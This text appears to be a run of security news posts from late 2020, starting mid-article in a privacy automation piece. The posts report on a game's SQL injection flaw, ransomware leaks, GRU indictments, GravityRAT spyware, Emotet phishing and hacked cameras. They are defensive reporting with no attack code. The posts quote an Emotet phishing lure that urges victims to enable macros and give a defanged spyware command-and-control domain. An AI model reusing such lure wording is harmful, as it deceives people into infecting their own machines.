  • Data Mapping: Organizations have stored immense amounts of data over their internal and external systems that can spread across on a geographic level. In order to quickly link this data to the owner to avoid any delays, data mapping automation plays a quintessential part in complying with any data privacy regulation.
  • Vendor Assessment: Manually assessing your third-party vendors and your own organization can be a tedious task that can present several bottlenecks and lack in collaboration. Whether you want to collaborate with key stakeholders or third-party vendors, there needs to be an automated system that can bring about this automation while simplifying the assessment process.
  • Consent Management: Regulations such as the CCPA and GDPR require organizations to take freely given consent from their consumers before processing their data. Doing this task manually leaves room for human error and also the use of time and resources. Organizations need to create a universal consent capture system that can make this process faster while freeing up resources as well.
  • Breach Notification: Privacy regulations require organizations to send a notification in case of a breach. Under the GDPR, for example,an obligatory 72-hour data breach notice for unauthorized access to systems and data, use and distribution of data is mandatory (Article 33). Recognizing a breach and then sending out a notification through manual means makes it virtually impossible to comply with the time frame given. Automating your breach notification system can save organizations thousands in fines.
  • Privacy Policy Management: One of the core parts of any regulation is the need to revamp an organization’s privacy policies. These policies need to be in line with the data privacy regulations in order to comply. Organizations will need to revisit their privacy policies and change them according to the guidelines provided by these privacy regulations.

Automation: the Future of Compliance

The future beckon the arrival of automation and organizations will have to quickly adopt this if they hope to improve their chances at complying with global privacy regulations. Irrespective of the current state of the globe, data regulations are still going into effect and being enforced. If an organization hopes to comply with these regulations they need to find a solution that will automate their operations and manage all the aforementioned privacy requirements.

Aoife Harney says “Being able to clearly see when a client’s personal data was collected, what legal basis is relied upon for that activity, who accesses that information, and when it’s appropriate to erase is incredibly useful to any organization,” 

Organizations need to find a solution that will help them with their compliance requirements. The ideal situation would be to get this solution from an organization that allows flexibility and customization, as well as one that considers your suggestions from early adopters.

Organizations can also consider SECURITI.ai which is reputed as the Privacy Leader that offers a one-stop data privacy solution to businesses.

Authors:

Ramiz Shah, Digital Content Producer at SECURITI.ai

Anas Baig, Team Lead at SECURITI.ai

Pierluigi Paganini

(SecurityAffairs – hacking, automation)

The post How Automation can help you in Managing Data Privacy appeared first on Security Affairs.

Dynamic Data Resolver – Version 1.0.1 beta

Cisco Talos is releasing a new beta version of Dynamic Data Resolver (DDR) today. This release comes with a new architecture for samples using multi-threading. The process and thread tracing has been completely reimplemented.

We also fixed a few bugs and memory leaks. Another new feature is that the DDR backend now comes in two flavors: a release version and a debugging version. The latter will improve code quality and bug hunting. It helps to detect memory leaks and minor issues which are silently handled by the underlying DynamoRIO framework in the release version. We also improved the installer and the IDA plugin is now installed to the user plugin directory instead to the IDA installation directory under Program Files. The IDA plugin and all its dependencies are also now automatically installed by a script.

Fantastic news! DDR has won the HexRays IDA plugin contest 2020

READ MORE>>

The post Dynamic Data Resolver – Version 1.0.1 beta appeared first on Cisco Blogs.

MMO game Street Mobster leaking data of 1.9 million users due to critical vulnerability

Researchers discovered that MMO game Street Mobster is leaking data of 1.9 million users due to SQL Injection critical vulnerability.

Attackers could exploit the SQL Injection flaw to compromise the game’s database and steal user data.

Original Post: https://cybernews.com/street-mobster-game-leaking-data-of-2-million-players

The CyberNews.com Investigation team discovered a critical vulnerability in Street Mobster, a browser-based massively multiplayer online game created by Bulgarian development company BigMage Studios.

Street Mobster is a free to play, browser-based online game in the mafia empire genre where players manage a fictional criminal enterprise. The game boasts a 1.9+ million player base and stores a user record database that can be accessed by threat actors by committing an SQL Injection (SQLi) attack on the game’s website.

The records that can be compromised by exploiting the SQLi vulnerability in Street Mobster potentially include the players’ usernames, email addresses, and passwords, as well as other game-related data that is stored on the database.

Fortunately, after we reported the vulnerability to BigMage Studios, CERT Bulgaria, and the Bulgarian data protection authority, the issue has been fixed by the developers and the user database is no longer accessible to potential attackers.

Street Mobster

What is SQL Injection?

First found back in 1998, SQLi is deemed by the Open Web Application Security Project (OWASP) as the number one web application security risk.

Even though this vulnerability is relatively easy to fix, researchers found that 8% of websites and web applications are still vulnerable to SQLi attacks in 2020. Which, from a security perspective, is inexcusable. So much so, in fact, that UK internet service provider TalkTalk was hit with a record £400,000 fine over succumbing to a cyberattack that involved SQLi.

The vulnerability works by injecting an unexpected payload (a piece of code) into the input box on the website or in its URL address. Instead of reading the text as part of the URL, the website’s server reads the attacker’s payload as code and then proceeds to execute the attacker’s command or output data that would otherwise be inaccessible to unauthorized parties. Attackers can exploit SQLi even further by uploading pieces of code or even malware to the vulnerable server.

The fact that Street Mobster is susceptible to SQLi attacks clearly shows the disappointing and dangerous neglect of basic security practices on the part of the developers at BigMage Studios.

How we found this vulnerability

Our security team identified an SQL Injection vulnerability on the Street Mobster website and were able to confirm the vulnerability by performing a simple command injection test on the website URL. The CyberNews team did not extract any data from the vulnerable Street Mobster database.

What’s the impact of the vulnerability?

The data in the vulnerable Street Mobster database can be used in a variety of ways against the players whose information was exposed:

  • By injecting malicious payloads on Street Mobster’s server, attackers can potentially gain access to said server, where they can install malware on the game’s website and cause harm to the visitors – from using the players’ devices to mine cryptocurrency to redirecting them to other malicious websites, installing malware, and more.
  • The 1.9 million user credentials stored on the database can net the attackers user email addresses and passwords, which they can potentially use for credential stuffing attacks to hack the players’ accounts on other gaming platforms like Steam or other online services.
  • Because Street Mobster is a free-to-play game that incorporates microtransactions, bad actors could also make a lot of money from selling hacked player accounts on gray market websites.

What to do if you’ve been affected?

If you have a Street Mobster account, make sure to change your password immediately and make it as complex as possible. If you’ve been using your Street Mobster password on any other websites or services, change that password as well. This will prevent potential attackers from accessing your accounts on these websites in case they try to reuse your password for credential stuffing attacks. 

However, it’s ultimately up to BigMage Studios to completely secure your Street Mobster account against attacks like SQLi.

Disclosure and lack of communication from BigMage Studios

Following our vulnerability disclosure guidelines, we notified the BigMage Studios about the leak on August 31, 2020. However, we received no reply. Our follow-up emails were left unanswered as well. 

We then reached out to CERT Bulgaria on September 11 in order to help secure the website. CERT contacted the BigMage Studios and informed the company about the misconfiguration. 

Throughout the disclosure process, BigMage Studios stayed radio silent and refused to get in touch with CyberNews.com. Due to this reason, we also notified the Bulgarian data protection agency about the incident on October 9 in the hopes that the agency would be able to pressure the company into fixing the issue. 

Eventually, however, BigMage Studios appear to have fixed the SLQi vulnerability on streetmobster.com, without informing either CyberNews.com or CERT Bulgaria about that fact.

Pierluigi Paganini

(SecurityAffairs – hacking, Street Mobster)

The post MMO game Street Mobster leaking data of 1.9 million users due to critical vulnerability appeared first on Security Affairs.

Nefilim ransomware gang published Luxottica data on its leak site

The Nefilim ransomware operators have posted a long list of files that appear to belong to Italian eyewear and eyecare giant Luxottica.

Luxottica Group S.p.A. is an Italian eyewear conglomerate and the world’s largest company in the eyewear industry. As a vertically integrated company, Luxottica designs, manufactures, distributes and retails its eyewear brands, including LensCrafters, Sunglass Hut, Apex by Sunglass Hut, Pearle Vision, Target Optical, Eyemed vision care plan, and Glasses.com. Its best known brands are Ray-Ban, Persol, and Oakley. Luxottica also makes sunglasses and prescription frames for designer brands such as Chanel, Prada, Giorgio Armani, Burberry, Versace, Dolce and Gabbana, Miu Miu, and Tory Burch.

Luxottica employs over 80,000 people and generated 9.4 billion in revenue for 2019.

On September 18, the company was hit by a cyberattack, some of the web sites operated by the company were not reachable, including Ray-Ban, Sunglass Hut, LensCrafters, EyeMed, and Pearle Vision.

Italian media outlets reported that the operations at the plants of Luxottica in Agordo and Sedico (Italy) were disrupted due to a computer system failure. Union sources confirmed that the personnel at the plants received an SMS in which they were notified that “the second workshift of today 21 September is suspended” due to “serious IT problems”.

BleepingComputer website, citing the security firm Bad Packets, speculates that the Italian was using a Citrix ADX controller device vulnerable to the critical CVE-2019-19781 vulnerability in Citrix devices.

At the time Luxottica has yet to release any official statement on the attack.

Security experts believe that threat actor exploited the above flaw to infect the systems at the company with ransomware.

Now we have more information about the incident, that seems to be the result of a ransomware attack.

The popular Italian cyber security expert Odysseus first revealed on the web site “Difesa e Sicurezza” that the Nefilim ransomware operators have posted a long list of files that appear to belong to Luxottica.

The huge trove of files appears to be related to the personnel office and finance departments.

Luxottica

The analysis of the leaked files revealed that they contain confidential information regarding the recruitment process, professional resumes, and info about the internal structures of the Group’s human resource department.

The exposed financial data includes budgets, marketing forecast analysis, and other sensitive data.

Nefilim ransomware operators also published a message which accuses Luxottica of having failed the properly manage the attack.

In the past months, the number of ransomware attacks surged, numerous ransomware gangs made the headlines targeting organizations worldwide and threating the victims of releasing the stolen data if the ransom was not paid.

“Extortion it’s the “new deal” of the cybercrime: now, more than in the past, companies can’t “hide” the cyber attack anymore. Now it becomes mandatory “manage” the breach from the communication perspective: dissembling is useless and harmful.” explained Odysseus. “And again, defend the companies from the cyber attacks becomes even more strategic: data leaks damages can generate tremendus amount of costs for companies worldwide.”

One of the crews that adopted this double-extortion model is the Nefilim ransomware gang that targeted several organizations including the mobile network operator Orange,  the independent European leader in multi-technical services The SPIE Group, the German largest private multi-service provider Dussman Group.

Pierluigi Paganini

(SecurityAffairs – hacking, Luxottica)

The post Nefilim ransomware gang published Luxottica data on its leak site appeared first on Security Affairs.

Pay it safe: Group-IB aids Paxful in repelling a series of web-bot attacks

Group-IB assisted Paxful, an international peer-to-peer cryptocurrency marketplace, in countering web-bot and social engineering attacks

Group-IB, a global threat hunting and intelligence company headquartered in Singapore, has assisted Paxful, an international peer-to-peer cryptocurrency marketplace, in countering a wave of web-bot and social engineering attacks, and customer account takeovers. Powered with Group-IB’s solution for online fraud prevention Secure Portal, the platform has managed to fight off over 220,000 requests from web-bots in just two months, shielding its 4.5 million customers against possible attacks. The figure suggests that bitcoin platforms remain of great interest to threat actors. 

Cryptocurrencies, in general, are the apple of cybercriminals’ eye: Group-IB has alerted cryptocurrency holders to various scams on numerous occasions: fake giveawaysnon-existent cryptocurrency investment platforms, as well as personal data-exposing schemes, have found hundreds of thousands of people as their victims.

The scope of online threats that Paxful faced before acquiring Secure Portal ranged from social engineering attacks to customer account takeover, which is not surprising given the popularity of cryptocurrencies. But it was the detection and prevention of bad bot activity that pushed Paxful to adopt an additional layer of cybersecurity and resort to Group-IB. Bots, which are reported to generate about a quarter of global Web traffic, are de facto programs that emulate the actions of a real device for the purposes needed. They are a big headache for eCommerce businesses today, with cybercriminals using them to steal money, brute-force user credentials or carry out DDoS attacks. 

The brute-forcing of user credentials was the case with Paxful. To successfully thwart bad-bot activity, Group-IB Secure Portal creates a unique fingerprint of a device that is based on over a dozen of indicators and metrics, including info on the user-agent, platform, operation system, the time zone from which the user operates, device language, and others. Based on this fingerprinting and behavioral analysis, Group-IB Secure Portal identifies and issues an alert for any suspicious activity in real-time, after which this detection is used by Paxful to block bad bots. 

Trojans have also been spotted in the attacks on the marketplace: Group-IB Secure Portal has identified at least 1,200 user devices infected with Trojans. The detection of malware is considerably facilitated by the fact that Secure Portal is fueled by the information on threat actors, different malware strains’ behavior, malicious IPs and compromised data, such as login credentials or bank card data, from Group-IB attribution-based Threat Intelligence, a proprietary system that holds the most up-to-date data on advanced attackers and their TTPs. 

Group-IB Secure Portal also managed to identify over 100,000 accounts with three or more logins from the same device. Some of these accounts were simply compromised, others were used to boost rank on the platform for further fraud activity or were just resold. 

“For Paxful, Group-IB was the perfect solution; we were particularly impressed by the accuracy of Group-IB’s device fingerprint technology,” comments Dmitry Moiseev, the Chief Information Security Officer at Paxful. “The unique technology that easily detects suspicious devices is exactly what we were looking for. Interactive graph visualization tools and strong API create a truly comprehensive experience when it comes to fraud investigation. With reliable and helpful technical support, Group-IB is a well-rounded cybersecurity solution that works for us.” 

With the deployment of Group-IB Secure Portal, Paxful is now even better equipped to mitigate fraud and prevent digital crimes well before they are even close to affecting the company’s multimillion customer base. 

“Businesses are struggling more than ever today and to ensure that their customers are safe from fraud when using online services is the new normal,” comments Group-IB International Business Development Director Nicholas Palmer. “Online fraud is one of the biggest hurdles on the path toward achieving a positive client experience. For online platforms, it is extremely important to ensure the safety of its users and the integrity of its cybersecurity, whose perimeter should extend to end-point devices and the protection of its clients. Group-IB Secure Portal is implementing this philosophy through its patented clientless detection technology, which protects clients’ customers without need for the latter to install any additional apps.”

About Group-IB Secure Portal

Group-IB Secure Portal is a client-side fraud prevention solution working across sessions, platforms, and devices in real time.

Group-IB Secure Portal effectively detects and prevents dangerous activities through behavior analysis, anomaly detection, daily automatic filter rule and signature updates based on unique data from Group-IB’s Threat Intelligence.

The combination of advanced anti-fraud technologies and intelligence protects both banking and retail customers. Moreover, it helps comply with legal requirements designed to protect funds belonging to individuals and companies against scammers.   

About Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks and online fraud. The company also specializes in high-profile cyber investigations and IP protection services.

Group-IB is a partner of INTERPOL, Europol, and has been recommended by the OSCE as a cybersecurity solutions provider.

Pierluigi Paganini

(SecurityAffairs – hacking, Iran)

The post Pay it safe: Group-IB aids Paxful in repelling a series of web-bot attacks appeared first on Security Affairs.

U.S. Charges Russia GRU Intelligence Officers for notorious attacks, including NotPetya

The U.S. DoJ announced charges against six Russian intelligence officers for their role in several major cyberattacks carried out over the last years.

The U.S. Department of Justice announced charges against six members of Russia’s GRU military intelligence agency for their alleged role in several major cyberattacks conducted over the past years.

The defendants are Yuriy Sergeyevich Andrienko, aged 32, Sergey Vladimirovich Detistov, 35, Pavel Valeryevich Frolov, 28, Anatoliy Sergeyevich Kovalev, 29, Artem Valeryevich Ochichenko, 27, and Petr Nikolayevich Pliskin, 32.

The six Russian intelligence officers are believed to be members of the Russia-linked Sandworm APT group (aka Telebots, Iron Viking and Voodoo Bear).

According to the indictment, the GRU officers were involved in attacks on Ukraine, including the attacks aimed at the country’s power grid in 2015 and 2016 that employed the BlackEnergy and Industroyer malware.

US DoJ charged the men with damaging protected computers, conspiracy to conduct computer fraud and abuse, wire fraud, conspiracy to commit wire fraud, and aggravated identity theft.

Government experts linked the Russian APT group to major attacks, including NotPetya, a hacking operation targeting elections in France in 2017, the attack against PyeongChang Winter Olympics that involved the Olympic Destroyer malware, as well as a series of attacks on Georgian companies and government organizations.

“Their computer attacks used some of the world’s most destructive malware to date, including: KillDisk and Industroyer, which each caused blackouts in Ukraine; NotPetya, which caused nearly $1 billion in losses to the three victims identified in the indictment alone; and Olympic Destroyer, which disrupted thousands of computers used to support the 2018 PyeongChang Winter Olympics.” reads the press release published by the DoJ. “The indictment charges the defendants with conspiracy, computer hacking, wire fraud, aggravated identity theft, and false registration of a domain name.”

Since November 2015 and until at least in October 2019, the defendants and their co-conspirators were involved in the development and deployment of destructive malware and took part in disruptive hacking campaign actions,.

Below the list overt acts for each defendant:

DefendantSummary of Overt Acts
Yuriy Sergeyevich Andrienko·      Developed components of the NotPetya and Olympic Destroyer malware.
Sergey Vladimirovich Detistov·      Developed components of the NotPetya malware; and·      Prepared spearphishing campaigns targeting the 2018 PyeongChang Winter Olympic Games. 
Pavel Valeryevich Frolov·       Developed components of the KillDisk and NotPetya malware.
Anatoliy Sergeyevich Kovalev·       Developed spearphishing techniques and messages used to target:-       En Marche! officials;-       employees of the DSTL;-       members of the IOC and Olympic athletes; and-       employees of a Georgian media entity.
Artem Valeryevich Ochichenko·       Participated in spearphishing campaigns targeting 2018 PyeongChang Winter Olympic Games partners; and·       Conducted technical reconnaissance of the Parliament of Georgia official domain and attempted to gain unauthorized access to its network.
Petr Nikolayevich Pliskin·       Developed components of the NotPetya and Olympic Destroyer malware. 

The FBI added the defendants to the Cyber’s Most Wanted list.

“The FBI has repeatedly warned that Russia is a highly capable cyber adversary, and the information revealed in this indictment illustrates how pervasive and destructive Russia’s cyber activities truly are,” said FBI Deputy Director David Bowdich.  “But this indictment also highlights the FBI’s capabilities.  We have the tools to investigate these malicious malware attacks, identify the perpetrators, and then impose risks and consequences on them.  As demonstrated today, we will relentlessly pursue those who threaten the United States and its citizens.”

“For more than two years we have worked tirelessly to expose these Russian GRU Officers who engaged in a global campaign of hacking, disruption and destabilization, representing the most destructive and costly cyber-attacks in history,” said Scott Brady, U.S. Attorney for the Western District of Pennsylvania. “The crimes committed by Russian government officials were against real victims who suffered real harm. We have an obligation to hold accountable those who commit crimes – no matter where they reside and no matter for whom they work – in order to seek justice on behalf of these victims.”

GRU intelligence officers charged

Pierluigi Paganini

(SecurityAffairs – hacking, intelligence)

The post U.S. Charges Russia GRU Intelligence Officers for notorious attacks, including NotPetya appeared first on Security Affairs.

Is poor cyber hygiene crippling your security program?

Cybercriminals are targeting vulnerabilities created by the pandemic-driven worldwide transition to remote work, according to Secureworks. The report is based on hundreds of incidents the company’s IR team has responded to since the start of the pandemic. Threat level is unchanged While initial news reports predicted a sharp uptick in cyber threats after the pandemic took hold, data on confirmed security incidents and genuine threats to customers show the threat level is largely unchanged. Instead, … More

The post Is poor cyber hygiene crippling your security program? appeared first on Help Net Security.

GravityRAT malware also targets Android and macOS

Researchers spotted new variants of the Windows GravityRAT spyware that now can also infect Android and macOS devices.

Researchers from Kaspersky Lab have spotted new variants of the GravityRAT malware that now can be also used to infect Android and macOS devices.

GravityRAT is a malware strain known for checking the CPU temperature of Windows computers to avoid being executed in sandboxes and virtual machines.

The GravityRAT malware Access Trojan (RAT) is believed to be the work of Pakistani hacker groups, it is under development at least since 2015.

“Today, Cisco Talos is uncovering a new piece of malware, which has remained under the radar for the past two years [since 2015] while it continues to be developed.” reads an analysis published by Cisco Talos that spotted the malware back in 2017 when it was used by an APT group targeting India.

The sample analyzed by Kaspersky last year is able to infect macOS and Android devices, unlike past variants that were focused on Windows.

Crooks also started using digital signatures to make the apps look more legitimate.

The malware researchers found the new Android GravityRAT sample in 2019, on VirusTotal. The hackers had added a spy module to Travel Mate, an Android app for travelers to India, the source code of which is available on Github.

gravityRAT

The tainted app is able to steal contacts, emails, and documents from the infected device, then send them back to the command-and-control server (nortonupdates[.]online). The C&C server was also associated with other two malicious apps (Enigma and Titanium) targeting the Windows and macOS platforms.

The spyware is able to get information about the system and support multiple features, including:

  • search for files on the computer and removable disks with the extensions .doc, .docx, .ppt, .pptx, .xls, .xlsx, .pdf, .odt, .odp, and .ods, and upload them to the server
  • get a list of running processes
  • intercept keystrokes
  • take screenshots
  • execute arbitrary shell commands
  • record audio (not implemented in this version)
  • scan ports

The malware was distributed via applications that clone legitimate apps that act as downloader for the GravityRAT payloads.

The applications analyzed by Kaspersky were developed in .NET, Python and Electron framework, they achieve persistence by adding a scheduled task.

The researchers reported that the malware was employed in approximately 100 successful attacks between 2015 and 2018. The list of targets includes employees at defense, police, and other departments and organizations.

Threat actors tricked the victims into installing a malicious app disguised as a secure messenger in order to continue the conversation, the attackers contacted the victims through a fake Facebook account. The attackers likely sent to the victims download links.

“It is safe to assume that the current GravityRAT campaign uses similar infection methods — targeted individuals are sent links pointing to malicious apps.” concludes Kaspersky.

“The main modification seen in the new GravityRAT campaign is multiplatformity: besides Windows, there are now versions for Android and macOS. The cybercriminals also started using digital signatures to make the apps look more legitimate.”

Pierluigi Paganini

(SecurityAffairs – hacking, GravityRAT)

The post GravityRAT malware also targets Android and macOS appeared first on Security Affairs.

Alexander Vinnik, the popular cyber criminal goes on trial in Paris

The Russian citizen Alexander Vinnik goes on trial in Paris for having defrauded nearly 200 victims across the world of 135 million euros using ransomware.

The Russian man Alexander Vinnik goes on trial in Paris for having defrauded nearly 200 victims across the world of 135M euros using ransomware.

Alexander Vinnik allegedly headed the Bitcoin exchange BTC-e, he is charged with different hacking crimes in Russia, France, and the United States.

In 2017, Greek Police arrested the Russian national Alexander Vinnik and they accused the man of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

AlexanderVinnik

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering for more than $4 billion worth amount of Bitcoin (BTC) resulting from criminal activities, the US prosecutors requested his extradition in July 2017.

Vinnik is also accused to be responsible for the failure of the Japanese bitcoin exchange Mt. Gox.

Mt. Gox was the biggest Bitcoin exchange at the time of the shut down in 2014 that occurred after the platform was the victim of a series of cyber heists for a total of $375 million in Bitcoin.

The U.S. authorities speculate the Russian man stole funds from Mt. Gox, with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and funds were laundered through his platform BTC-e-service during a three-year period.

In July 2018 there was a twist, a Greek lower court agreed to extradite Vinnik to France to face with charges with hacking, money laundering, extortion and involvement in organized crime.

French authorities accused Vinnik of defrauding more than 100 people in six French cities between 2016 and 2018.

French prosecutors revealed that among the 188 victims of the Vinnik’s attacks, there were local authorities, businesses, and individuals across the world.

Vinnik continues to deny charges of extortion and money laundering and did not answer magistrates’ questions.

“Prosecutors identified 20 businesses in six cities across France among the victims and following the money trail through various bank accounts — as much as $8 million — identified one as belonging to Vinnik.” reported the AFP news.

In June, New Zealand police had frozen NZ$140 million (US$90 million) in assets linked to a Russian cyber criminal. New Zealand police had worked closely with the US Internal Revenue Service on the case and the investigation is still ongoing.

Pierluigi Paganini

(SecurityAffairs – hacking, cybercrime)

The post Alexander Vinnik, the popular cyber criminal goes on trial in Paris appeared first on Security Affairs.

The forum of the popular Albion Online game was hacked

Albion Online game maker discloses a data breach, hackers gained access to the company forum database by exploiting a known vulnerability.

Albion Online (AO) is a free medieval fantasy MMORPG developed by Sandbox Interactive, a studio based in Berlin, Germany

A threat actor has breached the forum of Albion Online and stole usernames and password hashes from its database.

According to Sandbox Interactive, the intrusion took place on Friday, October 16, and the hacker exploited a vulnerability in its forum platform, known as WoltLab Suite.

“Unfortunately, we have become aware of a data breach in one of our systems, in which a malicious actor gained access to parts of our forum’s user database.” reads the message published on the forum.

“The intruder was able to access forum user profiles, which include the e-mail addresses connected to those forum accounts. On top of that, the attacker gained access to encrypted passwords (in technical terms: hashed and salted passwords).”

Albion Online

The moderator of the forum pointed out that the intruder did not access to payment information.

According to Sandbox Interactive, the passwords were hashed with the Bcrypt hashing function and then salted with random data, which makes it hard to crack if the password is not weak.

“However, there is a small possibility they could be used to identify accounts with particularly weak passwords.” continues the German game maker.

In response to the data breach, the game maker notified the forum members about the intrusion and asked them to reset passwords.

The company notified the authorities, but did not reveal the number of impacted users. The game maker announced to have addressed the flaw exploited in the attack.

“So far we have prioritized fixing vulnerabilities and informing players about this incident,” Sandbox Interactive said.

The game is believed to have more than 2.5 million players, while the number of registered members of the forum was 293,602 at the time of the attack.

Pierluigi Paganini

(SecurityAffairs – hacking, Albion Online)

The post The forum of the popular Albion Online game was hacked appeared first on Security Affairs.

New Emotet campaign uses a new ‘Windows Update’ attachment

After a short pause, a new Emotet malware campaign was spotted by the experts on October 14th, crooks began using a new ‘Windows Update’ attachment.

After a short interruption, a new Emotet malware campaign was spotted by the experts in October. Threat actors began using new Windows Update attachments in a spam campaign aimed at users worldwide.

The spam campaign uses a new malicious attachment that pretends to be a message from Windows Update and attempts to trick the victims recommending to upgrade Microsoft Word.

The Emotet banking trojan has been active at least since 2014, the botnet is operated by a threat actor tracked as TA542. In the middle-August, the malware was employed in fresh COVID19-themed spam campaign

Recent spam campaigns used messages with malicious Word documents, or links to them, pretending to be an invoice, shipping information, COVID-19 information, resumes, financial documents, or scanned documents.

The infamous banking trojan is also used to deliver other malicious code, such as Trickbot and QBot trojan or ransomware such as Conti (TrickBot) or ProLock (QBot).

Emotet is a modular malware, its operators could develop new Dynamic Link Libraries to update its capabilities.

Recently, the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to warn of a surge of Emotet attacks that have targeted multiple state and local governments in the U.S. since August.

During that time, the agency’s EINSTEIN Intrusion Detection System has detected roughly 16,000 alerts related to Emotet activity.

The new campaign was observed on October 14th, the attackers are using multiple lures, including invoices, purchase orders, shipping information, COVID-19 information, and information about President Trump’s health.

The spam messages come with malicious Word (.doc) attachments or include links to download the bait document.

Upon opening the attachments users are instructed to ‘Enable Content,’ in this way the malicious macros will be executed starting the infection process.

“To trick users into enabling the macros, Emotet uses various document templates, including pretending to be created on iOS devices, Windows 10 Mobile, or that the document is protected.” reported BleepingComputer.

The recent campaign employed a new template that pretends to be a message from Windows Update urging the update of Microsoft Word to correctly view the document.

Below the message displayed to the users:

Windows Update
Some apps need to be updated
These programs need to be upgrade because they aren't compatible with this file format.
* Microsoft Word
You need to click Enable Editing and then click Enable Content.
Emotet

Researchers recommend sharing knowledge about malicious document templates used by Emotet in order to quickly identify them and avoid being infected.

Pierluigi Paganini

(SecurityAffairs – hacking, Emotet)

The post New Emotet campaign uses a new ‘Windows Update’ attachment appeared first on Security Affairs.

Hackers claim to have compromised 50,000 home cameras and posted footage online

A hacker collective claims to have hacked over 50,000 home security cameras and published their footage online, some of them on adult sites.

A group of hackers claims to have compromised over 50,000 home security cameras and published their private footage online.

Some footages were published on adult sites, experts reported that crooks are offering lifetime access to the entire collection for US$150.

The news was reported by The New Paper, which also confirmed that over 70 members already paid the US$150 subscription for lifetime access to the loot.

“Clips from the hacked footage have been uploaded on pornographic sites recently, with several explicitly tagged as being from Singapore.” reported The New Paper.”

“The group, which can be found on social messaging platform Discord, has almost 1,000 members across the globe. As of Saturday, it has claimed to have shared more than 3TB of clips with over 70 members who paid a subscription fee of US$150 (S$203) for lifetime access.”

The videos show people of varying ages in compromising positions, in some cases undressed.

Most of the videos appear to belong to people from Singapore, other private footages come from people living in Thailand, South Korea, and Canada.

The gang uses the instant messaging app Discord and has nearly 1,000 members, it focuses on the hacking security cameras.

As proof of the hacks, the gang is offering a free sample containing 700 megabytes worth of data, including over 4,000 clips and pictures. They would also offer access to all hijacked cameras with their customers.

“The group claims to have a list of more than 50,000 hacked cameras that members can access. It also claims that VIP members will be taught how to “explore, watch live and even record” hacked cameras through tutorials and personalised sessions.” continues the article.

The news is not surprising, unfortunately in many cases IoT devices, including IP cameras, are deployed without proper security measures.

At the time of publishing this post, it is still unclear how the hackers compromised the IP cameras, likely hackers exploited some vulnerabilities in the devices or simply guessed weak passwords used to protect them.

Let’s remind that accessing these IP cameras could be considered a serious crime, where the victims are under the age of 16, the users could be charged for child pornography.

“As worrying as it may seem, this comes as a clear reminder that when cameras are placed on the internet, they must be properly installed with security in mind. When smart devices are set up, they are still regularly placed around the home with no second thought for privacy,” said ESET Security Specialist Jake Moore.

In 2017, thousands of IP cameras have been hijacked by the Persirai IoT botnet that targeted more than 1,000 IP camera models.

In June 2017, security experts at security firm F-Secure discovered tens of vulnerabilities in tens of thousands of Internet-connected cameras from China-based manufacturer Foscam.

The flaws could be exploited by attackers to take over the Internet-connected cameras, upload and download files from the built-in FTP server, and view video feeds.

Pierluigi Paganini

(SecurityAffairs – hacking, IP cameras)

The post Hackers claim to have compromised 50,000 home cameras and posted footage online appeared first on Security Affairs.

Most US states show signs of a vulnerable election-related infrastructure

75% of all 56 U.S. states and territories leading up to the presidential election, showed signs of a vulnerable IT infrastructure, a SecurityScorecard report reveals. Since most state websites offer access to voter and election information, these findings may indicate unforeseen issues leading up to, and following, the US election. Election infrastructure: High-level findings Seventy-five percent of U.S. states and territories’ overall cyberhealth are rated a ‘C’ or below; 35% have a ‘D’ and below. … More

The post Most US states show signs of a vulnerable election-related infrastructure appeared first on Help Net Security.

FIN11 gang started deploying ransomware to monetize its operations

The financially-motivated hacker group FIN11 has started spreading ransomware to monetize its cyber criminal activities.

The financially-motivated hacker group FIN11 has switched tactics starting using ransomware as the main monetization method.

The group carried out multiple high-volume operations targeting companies across the world, most of them in North America and Europe.

In recent attacks, the group was observed deploying the Clop ransomware into the networks of its victims.

Since August, FIN11 started targeting organizations in many industries, including defense, energy, finance, healthcare, legal, pharmaceutical, telecommunications, technology, and transportation.

Researchers from FireEye’s Mandiant observed FIN11 hackers using spear-phishing messages distributing a malware downloader dubbed FRIENDSPEAK.

“Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands.” reads the analysis published by FireEye. “The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.”

The attack chain starts when the victims enable the macro embedded in an Excel spreadsheet that came with the phishing e-mails.

The macros download and execute the FRIENDSPEAK code, which in turn downloads the MIXLABEL malware.

Experts also reported that the threat actor modified the macros in Office documents used as bait and also added geofencing techniques.

Mandiant researchers highlighted an important with operations conducted by the TA505 cybercrime gang (aka Evil Corp), which has been active since 2014 focusing on retail and banking sectors.

TA505 also deployed the Clop ransomware in its malware campaigns and recently started exploiting the ZeroLogon critical flaw to compromise targeted organizations.

“Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware.” reads the analysis. “Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.”

fin11 services3

The experts pointed out that the FIN11 actors after dropped the Clop ransomware did not abandon the target after losing access, at least in one case they re-compromised the target organization a few months later.

The researchers believe FIN11 operates from the Commonwealth of Independent States (CIS – former Soviet Union countries).

The experts observed Russian-language file metadata in the code of the malware and reported that the Clop ransomware was only deployed on machines with a keyboard layout used outside CIS countries.

Mandiant researchers speculate FIN11 will continue to target organizations with sensitive proprietary data and that will likely pay the ransom to recover their operations after the attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, FIN11)

The post FIN11 gang started deploying ransomware to monetize its operations appeared first on Security Affairs.

Microsoft released out-of-band Windows fixes for 2 RCE issues

Microsoft released two out-of-band security updates to address remote code execution (RCE) bugs in the Microsoft Windows Codecs Library and Visual Studio Code.

Microsoft has released two out-of-band security updates to address two remote code execution (RCE) vulnerabilities that affect the Microsoft Windows Codecs Library and Visual Studio Code.

The two vulnerabilities, tracked as CVE-2020-17022 and CVE-2020-17023, have been rated as important severity.

